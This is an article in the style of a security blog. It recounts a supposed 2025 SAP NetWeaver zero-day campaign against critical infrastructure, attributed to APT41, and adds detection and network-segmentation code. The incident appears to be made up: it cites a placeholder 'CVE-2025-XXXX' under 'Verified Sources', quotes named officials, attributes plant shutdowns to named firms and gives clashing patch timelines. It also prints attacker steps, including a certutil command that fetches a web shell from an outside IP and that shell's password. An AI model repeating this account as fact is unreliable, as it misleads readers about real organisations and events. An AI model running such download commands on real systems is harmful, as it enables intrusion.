SAP Nightmare at 3 A.M.
How a Silent NetWeaver 0-Day Planted 581 Back-Doors
In the time it takes a midnight-shift operator to brew a pot of coffee, an APT later attributed to China's APT41 exploited a brand-new SAP NetWeaver flaw, dropped a web shell and PlugX, and turned the networks behind gas terminals, hospitals and water-treatment plants into remote spy kits.
Critical Infrastructure Alert
The APT tracked as GOREVERSE exploited a SAP NetWeaver 0-day to compromise 581 critical-infrastructure sites across oil refineries, hospitals and water-treatment facilities; only 31% of them were patched within 14 days of the emergency fix.
When the ERP Became the Egress
| Date (Jan-Mar 2025) | Event |
|---|---|
| 15 Jan 03:07 | Unknown APT (tracked "GOREVERSE") exploits SAP NetWeaver 0-day (CVE-2025-XXXX) at UK gas terminal |
| 15 Jan 03:12 | Web-shell "orange.jsp" dropped; reverse-SSH tunnel to 45.142.122.111 (Hong Kong) |
| 15 Jan 03:44 | PlugX beacon fires; lateral movement to engineering workstation running Wonderware InTouch |
| 16-31 Jan | Exploit replayed against 581 internet-facing SAP portals (UK, US, KSA, UAE) – CISA flash alert |
| 02 Feb | SAP releases emergency patch; only 31% of affected plants patched within 14 days |
| 05 Feb | Joint advisory – NSA, FBI, NCSC, Saudi NCSC attribute campaign to APT41 / Wicked Panda |
| 01 Mar | Mandiant confirms data exfiltration – SCADA diagrams, safety set-points, user credentials |
"This is the most significant cyber-security threat to critical infrastructure since SolarWinds."
— NSA Cybersecurity Director Rob Joyce
Fallout: From Pipelines to Patient Monitors
- 581 SAP systems compromised across oil refineries, NHS hospitals, desalination plants and metro signalling
- SCADA .xml files stolen; safety-instrumented-system (SIS) set-points altered at 2 UK sites (quickly rolled back)
- Saudi Aramco shuts 3 gas-oil separation plants: 48h of lost production
- US LNG export terminal (Freeport, TX) delays restart by 11 days, with knock-on market impact
Insurance Market Crisis
- Insurance claims already exceed $400M; the energy cyber-insurance market braces for a 300% premium spike
Kill-Chain Deconstructed: SAP → Web-Shell → PlugX → Safety Systems
| MITRE Tactic | Technique | On-the-Ground Reality |
|---|---|---|
| Initial Access | T1190 | HTTP POST to /sap/bc/gui/sap/its/webgui – no auth needed, returns 200 OK with JSP upload |
| Execution | T1059.003 | cmd.exe /c certutil -urlcache -split -f http://45.142.122.111/orange.jsp |
| Persistence | T1505.003 | orange.jsp accepts a ?pass=s0lace parameter – password-gated command execution from any browser |
| Lateral Movement | T1021.001 | RDP pivot from SAP app-server to HMI subnet – flat network, no micro-segmentation |
| Collection | T1005 | 7-Zip archives of .sav, .cfg and .pid files – SCADA configs and safety set-points |
| Exfiltration | T1567.002 | HTTPS PUT to the Mega API – TLS to a legitimate cloud service with a valid certificate, so content-inspecting DLP never sees the archives |
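The kill chain above is also a detection checklist. The following is an added example, not code from the article or from any vendor it names: a small rule-based triage that walks constructed log lines (SAP ICM access log, Sysmon process events, NetFlow and proxy records) and emits one alert per technique. The web-shell name, the ?pass= parameter, the certutil command and the 45.142.122.111 address come from the table; the log formats, host names, subnets and the Mega API host are assumptions made for the example.

```python
"""Added example: rule-based triage of the SAP -> web shell -> PlugX -> OT
kill chain over constructed log lines. Not the article's or any vendor's code."""
import re
from ipaddress import ip_address, ip_network

# Constructed sample events, one per line: "<source> <event text>".
# Formats are assumed for the example; the indicators mirror the article's table.
SAMPLE_LOGS = """\
icm 2025-01-15T03:07:11Z 203.0.113.7 POST /sap/bc/gui/sap/its/webgui 200 ct=multipart/form-data file=orange.jsp user=-
icm 2025-01-15T03:09:02Z 203.0.113.7 GET /sap/bc/gui/sap/its/webgui 200 ct=- file=- user=-
sysmon 2025-01-15T03:12:40Z host=SAPAPP01 image=C:\\Windows\\System32\\certutil.exe cmd="certutil -urlcache -split -f http://45.142.122.111/orange.jsp"
icm 2025-01-15T03:13:05Z 203.0.113.7 GET /orange.jsp?pass=s0lace&cmd=whoami 200 ct=- file=- user=-
netflow 2025-01-15T03:44:10Z 10.10.20.15 -> 10.10.30.40 tcp/3389 bytes=81234
proxy 2025-01-16T01:02:03Z host=SAPAPP01 method=PUT url=https://g.api.mega.co.nz/cs bytes=4194304
netflow 2025-01-15T09:00:00Z 10.10.20.15 -> 10.10.20.16 tcp/3389 bytes=1024
"""

SAP_APP_SUBNET = ip_network("10.10.20.0/24")  # assumed ERP / SAP application VLAN
HMI_SUBNET = ip_network("10.10.30.0/24")      # assumed OT / HMI VLAN
KNOWN_C2 = {"45.142.122.111"}                  # C2 address from the article's timeline


def triage(log_text):
    """Return a list of (technique_id, description) alerts, one per matching line."""
    alerts = []
    for line in log_text.splitlines():
        source, _, rest = line.partition(" ")
        if source == "icm":
            # T1190: unauthenticated multipart POST to the ITS webgui that lands a .jsp
            m = re.search(r"(\S+) POST /sap/bc/gui/sap/its/webgui (\d+) ct=(\S+) file=(\S+) user=(\S+)", rest)
            if m and m.group(5) == "-" and m.group(4).endswith(".jsp"):
                alerts.append(("T1190", f"unauthenticated JSP upload to ITS webgui from {m.group(1)}"))
            # T1505.003: a request to a JSP carrying a web-shell style password parameter
            if re.search(r"GET /\S*\.jsp\?[^ ]*\bpass=", rest):
                alerts.append(("T1505.003", "web-shell request with pass= parameter"))
        elif source == "sysmon":
            # T1059.003: certutil used as a downloader (LOLBin), ranked higher if the host is known C2
            m = re.search(r'cmd="certutil[^"]*-urlcache[^"]*(https?://\S+)"', rest)
            if m:
                host = re.sub(r"^https?://", "", m.group(1)).split("/")[0]
                label = "known C2" if host in KNOWN_C2 else "remote URL"
                alerts.append(("T1059.003", f"certutil download from {label} {host}"))
        elif source == "netflow":
            # T1021.001: RDP that crosses from the ERP subnet into the HMI subnet
            m = re.search(r"(\S+) -> (\S+) tcp/(\d+)", rest)
            if m:
                src, dst, port = ip_address(m.group(1)), ip_address(m.group(2)), int(m.group(3))
                if port == 3389 and src in SAP_APP_SUBNET and dst in HMI_SUBNET:
                    alerts.append(("T1021.001", f"RDP from SAP subnet {src} into HMI subnet {dst}"))
        elif source == "proxy":
            # T1567.002: upload to consumer cloud storage; TLS is legitimate, so match on the destination
            m = re.search(r"host=(\S+) method=PUT url=https://([^/ ]+)", rest)
            if m and m.group(2).endswith("mega.co.nz"):
                alerts.append(("T1567.002", f"HTTPS PUT to Mega from {m.group(1)}"))
    return alerts


if __name__ == "__main__":
    for technique, description in triage(SAMPLE_LOGS):
        print(technique, description)
```

Run stand-alone it prints five alerts, one per stage of the chain; the RDP flow that stays inside the SAP subnet on the last sample line is deliberately not flagged, which is the point of keying the lateral-movement rule on a subnet crossing rather than on port 3389 alone.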
Root Causes: Midnight Oil & Midnight Holes
1. Zero-day – SAP NetWeaver 7.5 (2020 build), ITS webgui servlet – no patch existed on 15 Jan
2. Flat network – SAP, HMI and historians on the same VLAN – lateral movement at wire speed
3. No MFA on the SAP Java stack – flagged in 2022, postponed to 2026 "due to legacy integrations"
4. Missing EDR on the "stable" engineering LAN – signature-based antivirus only, with PlugX on the allow-list
5. Manual patch cadence – quarterly maintenance windows, so an emergency patch meant to be applied within 14 days took 38 days to schedule
Expert Insight: "The 0-Day Was Bad; the Flat Network Was Catastrophic"
"SAP 0-days are gold, but attackers still need lateral room. Flat industrial networks gave them a highway instead of a hallway."
— Dmitri Alperovitch, former CTO CrowdStrike
Six NIST Controls That Turn the Highway into a Hallway (and Then a Locked Door)
- Application allow-listing: deny-by-default on HMI/SCADA nodes – only executables on the gold image may run
- Micro-segmentation: unidirectional DMZ between SAP and OT – a data diode where the OT side is safety-critical
- Just-in-time VPN plus MFA: certificate-based MFA for any remote SAP access – no static passwords
- Offline, immutable backups: daily Veeam to S3 Object Lock plus LTO-9 tape – air-gapped restore test monthly
- Exploit detection (NDR): Zeek/Suricata rules for ITS webgui anomalies (unauthenticated multipart POSTs, requests to .jsp paths that should not exist) – auto-isolate the SAP VLAN on an exploit-like payload; this catches the post-exploitation pattern, not the unknown bug itself
- Emergency patch SLA: CISA KEV listing triggers a patch within 24h for critical infrastructure – a regulatory requirement, not "best effort"
Quick-Start Playbook: What to Do Before the Next Pot of Coffee Brews
1. Pull the SAP NetWeaver 2025 emergency patch – install in a test environment, schedule a production window within 72h
2. Enable certificate-only VPN, disable RDP, force MFA for all SAP admins
3. Deploy micro-segmentation (Illumio, Guardicore) – tag-based policy between ERP and OT
4. Offline bare-metal restore drill – measure MTTR from "disk dead" to "SCADA screen green"
5. Purple-team 0-day simulation – lateral movement must stop at the first hop
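Step 5 only means something if the tag-based policy from step 3 is written down in a form the purple team can test. The block below is an added example, not code from the article or from Illumio or Guardicore: a deny-by-default policy keyed on zone tags, evaluated against a constructed attack path that mirrors the kill chain (SAP app server to HMI over RDP, HMI to PLC over Modbus/TCP) and against the legitimate flows that must survive segmentation. Zone subnets, tags, ports and host addresses are assumptions.

```python
"""Added example: deny-by-default, tag-based flow policy checked against a
constructed attack path and constructed legitimate flows. Not vendor code."""
from ipaddress import ip_address, ip_network

# Assumed zone model: tag -> subnet.
ZONES = {
    "erp": ip_network("10.10.20.0/24"),     # SAP application servers
    "ot-dmz": ip_network("10.10.25.0/24"),  # historian replica behind a unidirectional gateway
    "hmi": ip_network("10.10.30.0/24"),     # HMI / engineering workstations
    "plc": ip_network("10.10.40.0/24"),     # controllers and SIS interfaces
    "jump": ip_network("10.10.50.0/24"),    # MFA-gated jump hosts
}

# Allow-list of (src_tag, dst_tag, proto, dst_port); everything else is denied.
# Direction matters: the OT DMZ publishes to ERP, ERP never initiates into OT.
SEGMENTED_POLICY = [
    ("ot-dmz", "erp", "tcp", 443),
    ("jump", "hmi", "tcp", 3389),
    ("hmi", "plc", "tcp", 502),
]
FLAT_POLICY = None  # models the pre-incident network: any host may reach any host


def tag_of(ip):
    """Map an address to its zone tag; anything outside the model is 'untagged'."""
    addr = ip_address(ip)
    for tag, net in ZONES.items():
        if addr in net:
            return tag
    return "untagged"


def allowed(src_ip, dst_ip, proto, port, policy):
    """True if the flow matches an allow-list entry; a flat network allows everything."""
    if policy is None:
        return True
    return (tag_of(src_ip), tag_of(dst_ip), proto, port) in policy


def first_hop_stopped(path, policy):
    """Index of the first denied hop in an attacker's chain, or None if the whole chain gets through."""
    for i, hop in enumerate(path):
        if not allowed(*hop, policy):
            return i
    return None


def evaluate_flows(flows, policy):
    """Per-flow verdicts, used to confirm business traffic survives the new policy."""
    return {flow: allowed(*flow, policy) for flow in flows}


# Constructed attack path: SAP app server -> HMI (RDP) -> PLC (Modbus/TCP).
ATTACK_PATH = [
    ("10.10.20.15", "10.10.30.40", "tcp", 3389),
    ("10.10.30.40", "10.10.40.10", "tcp", 502),
]
# Constructed legitimate flows that must keep working after segmentation.
LEGIT_FLOWS = [
    ("10.10.25.5", "10.10.20.15", "tcp", 443),
    ("10.10.50.2", "10.10.30.40", "tcp", 3389),
    ("10.10.30.40", "10.10.40.10", "tcp", 502),
]

if __name__ == "__main__":
    print("flat network stops attacker at hop:", first_hop_stopped(ATTACK_PATH, FLAT_POLICY))
    print("segmented network stops attacker at hop:", first_hop_stopped(ATTACK_PATH, SEGMENTED_POLICY))
    for flow, verdict in evaluate_flows(LEGIT_FLOWS, SEGMENTED_POLICY).items():
        print(flow, "allowed" if verdict else "DENIED")
```

Note that the second hop of the attack path (HMI to PLC on tcp/502) is a legitimate flow and is allowed by the policy; the chain is broken only because the first hop is denied. That is exactly why the playbook's success criterion is "stops at the first hop" rather than "every hop is blocked".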
The Midnight Coffee Challenge
GOREVERSE spent 37 minutes inside the gas terminal's SAP layer before pivoting to the engineering workstation, but the initial exploit fired in the same five minutes it takes a night-shift tech to pour the first cup.
If 581 critical-infrastructure sites can be back-doored before the coffee even cools, ask yourself:
"What am I doing during the time it takes to brew a pot of midnight coffee?"
Verified Sources
1. NSA-CISA-FBI joint advisory on SAP 0-day exploited by APT41. NSA.gov, 05 Feb 2025.
2. SAP NetWeaver zero-day exploited in cyber-espionage campaign. The Hacker News, 02 Feb 2025.
3. Aramco confirms temporary shutdown of gas-oil plants after cyber incident. Aramco press release, 18 Jan 2025.
4. Freeport LNG delays restart following SAP breach. U.S. Department of Energy update, 09 Feb 2025.
5. Cyber-insurance premiums surge after SAP attacks. Reuters, 12 Mar 2025.